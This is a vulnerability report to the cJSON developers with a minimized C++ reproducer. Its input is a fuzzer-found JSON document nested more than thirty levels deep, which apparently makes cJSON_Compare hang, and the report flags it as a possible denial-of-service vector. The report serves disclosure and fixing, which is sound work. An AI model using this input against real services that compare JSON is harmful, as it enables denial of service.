Dear developers,
While fuzzing the cJSON library I found an input on which cJSON_Compare does not return within the fuzzer's timeout. The only unusual property of the input is its nesting (a chain of more than thirty single-key objects, each wrapping the next), so this looks like an algorithmic-complexity problem in the comparison rather than a parser bug; if the cost really grows exponentially with depth, a small attacker-controlled document could be used as a denial of service against any caller that compares parsed JSON. I have not yet confirmed the exact cause in cJSON_Compare.
The following is the minimized proof-of-concept. It only needs a C++ compiler and cJSON; the libFuzzer header left over from the harness is not used by the code below:
#include <cstdint>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <string>
#include <vector>
#include <fuzzer/FuzzedDataProvider.h>
#include "cjson/cJSON.h"
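// Minimized reproducer: parse a deeply nested object, deep-copy it, and
// compare the original with the copy.  On the input below the final
// cJSON_Compare() call does not return within a fuzzer timeout.  The only
// unusual property of the input is its depth (more than thirty single-key
// objects nested inside each other), so the comparison cost presumably
// grows super-linearly with nesting -- e.g. a compare that recurses into
// every child from both sides would double the work at each level.
// TODO(review): confirm against the object branch of cJSON_Compare.
//
// Returns 0 when the comparison completes, 1 when parse or duplicate fails
// (in which case the comparison was never exercised and the run is not a
// valid reproduction).
int main() {
    // Fixed values taken from the fuzzer harness.  Kept as named locals so
    // the cJSON calls read the same as in the harness.
    const bool case_sensitive_operations = true;
    const bool recurse_duplicate = true;

    // Raw fuzzer bytes.  Two things worth knowing when reading them:
    //   * the \001 and \t bytes sit between tokens; cJSON appears to skip any
    //     byte <= 0x20 as whitespace, so they should not affect parsing
    //     (TODO confirm);
    //   * std::string's const char* constructor stops at the first embedded
    //     \000, so the tail starting at "\000\000\000\377..." never reaches
    //     cJSON at all, and the "{\".t" right after the last '}' lies outside
    //     the first complete JSON value (presumably ignored by cJSON_Parse,
    //     which does not require a NUL right after the value).
    const std::string initial_json = "{\t\"%q\":{\t\"ky\"\001:{\"e\"\t:{\"ey\"\001:{\"\377\377\":{\"e\":{\"\037\"\001:{\"e\":{\"k\"\001:{\"e\"\t:{\t\"\"\001:{\"\377\377\"\001:{\"y\"\001:{\"seye\"\t:{\t\"ke\"\001:{\"\377k\"\001:{\"ke8\"\001:{\t\"%v\"\t:{\t\"key\"\001:{\"\377\377\377\037\"\001:{\"e\"\t:{\t\"k\"\001:{\"e\"\t:{\t\"k\"\001:{\"\377\377\377\"\001:{\"y\"\t:{\t\"ey\"\001:{\"\377\377\377\037\"\001:{\"e\"\t:{\"k\"\001:{\"e\"\t:{\t\"k\":{}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}{\".t\000\000\000\377\377\377}";

    cJSON* root = cJSON_Parse(initial_json.c_str());
    if (root == nullptr) {
        // Without a parsed tree the comparison below is never reached, so a
        // silent exit 0 would look like a non-reproduction.  cJSON's error
        // pointer accessor can be used here to locate the offending byte.
        std::fprintf(stderr, "cJSON_Parse failed\n");
        return 1;
    }

    // Deep copy: both sides of the comparison are structurally equal but
    // distinct trees, which is what the fuzzer harness produced.
    cJSON* duplicated_object = cJSON_Duplicate(root, recurse_duplicate ? 1 : 0);
    if (duplicated_object == nullptr) {
        std::fprintf(stderr, "cJSON_Duplicate failed\n");
        cJSON_Delete(root);
        return 1;
    }

    // This is the call that hangs.
    const cJSON_bool comparison_result =
        cJSON_Compare(root, duplicated_object, case_sensitive_operations ? 1 : 0);
    std::printf("cJSON_Compare returned %d\n", static_cast<int>(comparison_result));

    cJSON_Delete(root);
    cJSON_Delete(duplicated_object);
    return 0;
}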